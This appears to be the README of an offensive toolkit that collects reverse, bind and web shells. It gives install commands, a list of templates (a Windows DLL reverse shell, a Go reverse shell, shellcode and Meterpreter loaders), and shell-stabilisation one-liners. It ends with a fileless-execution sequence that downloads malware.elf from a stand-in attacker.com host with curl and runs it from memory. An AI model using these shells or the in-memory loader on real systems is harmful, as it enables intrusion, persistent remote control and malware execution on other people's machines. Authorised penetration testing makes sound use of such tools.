A collection of reverse, bind and web shells from all over the internet.
a) With pipx.
pipx install git+https://github.com/dadevel/shells.git@mainb) With pip.
pip install --user git+https://github.com/dadevel/shells.git@mainJust run getshell and select one of the many templates.
Some advanced templates require manual steps:
- TCP reverse shell in C++ as Windows DLL
- Cross-platform TCP reverse shell with Cosmopolitan Libc
- TCP reverse shell in Go
- Reverse shell listener with Tmux and Socat
- Python ELF loader via
memfd_create()on Linux - Python shellcode loader on Linux
- Meterpreter loader for Windows
Metasploit payloads like windows/shell_reverse_tcp are one of the few reverse shells for Windows that support interactive commands.
Spawn a PTY and stabilize your shell with Python.
python -c 'import pty;pty.spawn("/bin/bash")'
# ctrl+z
echo "stty sane;stty rows $LINES cols $COLUMNS;export TERM=xterm;" | xclip -sel clip
stty raw -echo && fg
# paste clipboard and press enterAlternatively spawn a PTY with script.
script -q -c /bin/bash /dev/nullCreate file in memory with Python 3.8 or newer (source).
$ python3 -c "from os import*;fork()or(setsid(),print(f'/proc/{getpid()}/fd/{memfd_create(sep)}'),kill(0,19))"
/proc/139856/fd/3
$ curl -o /proc/139856/fd/3 https://attacker.com/malware.elf
$ /proc/139856/fd/3